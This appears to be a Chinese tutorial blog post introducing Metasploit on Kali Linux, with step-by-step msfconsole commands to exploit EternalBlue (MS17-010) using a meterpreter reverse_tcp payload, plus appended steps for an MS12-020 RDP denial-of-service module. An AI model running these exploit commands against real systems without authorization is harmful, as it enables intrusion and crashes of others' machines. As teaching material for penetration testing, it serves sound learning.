渗透工具——kali中msf简介(以及MSF的基本使用方法)

一、什么是msf

Metasploit就是一个安全漏洞检测工具。它的全称叫做The Metasploit Framework,简称MSF。
msf专业术语:

1. 渗透攻击(Exploit)
攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。

2. 攻击载荷(Payload)
目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。

3. 溢出代码(Shellcode)
渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。

4. 模块(Module)
在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。

5. 监听器(Listener)
监听器是MSF中用来等待连入网络连接的组件。

二、MSF的一些常用命令

msfconsole:启动Metasploit控制台。

use <模块>:选择要使用的模块,例如use exploit/windows/smb/ms08_067_netapi

show options:显示当前模块的可配置参数。

set <参数> <值>:设置模块的参数值。

exploit:执行已配置的模块并尝试利用目标系统。

search <关键词>:搜索可用的模块。

sessions:显示当前会话列表。

sessions -i <会话ID>:切换到指定的会话。

background:将当前会话置于后台运行。

use multi/handler:启动一个监听器,等待来自攻击载荷的连接。

set payload <载荷>:设置监听器使用的攻击载荷。

run:执行监听器并等待连接。

二、我们通过实验来实践一下MSF的使用吧

1. 开启MSF:msfconsole

2. 我们使用永恒之蓝来进行实验吧

永恒之蓝的编号:ms17-010

搜索漏洞:search [漏洞编号]

3. 进入要使用的模块

设置模块:use auxiliary/scanner/smb/smb_ms17_010

4. 查看需要配置的设置:options

5. 设置目标地址:set rhosts [目标IP]

6. 设置完成后使用run或者exploit进行攻击

三、设置攻击模块进行攻击

1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:show options

设置目标地址:set RHOSTS [目标地址]

设置目标端口:set RPOST 445

设置payload:set payload windows/x64/meterpreter/reverse_tcp

设置本地地址:set LHOST [本地地址]

攻击:run/exploit

!注!:只能对有该漏洞的主机进行攻击

!注!:存在一定几率将目标机器打成蓝屏状态

  • 10
    点赞
  • 70
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Kali使用Metasploit Framework(MSF)进行漏洞利用和验证教学的过程如下: 1. 确保你已经在Kali Linux系统安装了Metasploit Framework。如果没有安装,可以使用以下命令进行安装: ``` sudo apt-get install metasploit-framework ``` 2. 在Kali打开终端,输入以下命令以启动Metasploit控制台: ``` msfconsole ``` 3. 在Metasploit控制台,首先使用nmap命令对目标主机进行端口扫描,以发现可能存在的漏洞。例如,对目标主机10.1.1.2进行扫描: ``` nmap -sS -Pn -A 10.1.1.2 ``` 这将帮助你确定是否存在MS12-020 RDP远程代码执行漏洞。 4. 确认漏洞存在后,可以使用Metasploit的漏洞利用模块进行漏洞利用。首先,使用`search`命令搜索ms12_020模块: ``` search ms12_020 ``` 这将列出所有与ms12_020漏洞相关的模块。 5. 选择一个合适的模块进行漏洞利用。可以使用`use`命令加模块的编号或模块路径来选择模块。例如,使用`use 0`或`use auxiliary/dos/windows/rdp/ms12_020_maxchannelids`选择漏洞利用模块。 6. 查看模块的参数设置,可以使用`show options`命令。根据需要设置相关参数,例如,使用`set rhosts 10.1.1.2`设置漏洞利用目标主机的IP地址。 7. 执行漏洞利用,可以使用`run`命令。Metasploit将尝试利用目标主机上的漏洞。 8. 此外,你还可以使用Metasploit的漏洞验证模块来验证3389端口的漏洞。使用`use auxiliary/scanner/rdp/ms12_020_check`进入漏洞验证模块,然后使用`show options`命令查看相关参数设置。 请注意,上述步骤仅用于教学目的,确保在合法授权和法律框架下使用Metasploit进行漏洞测试和利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值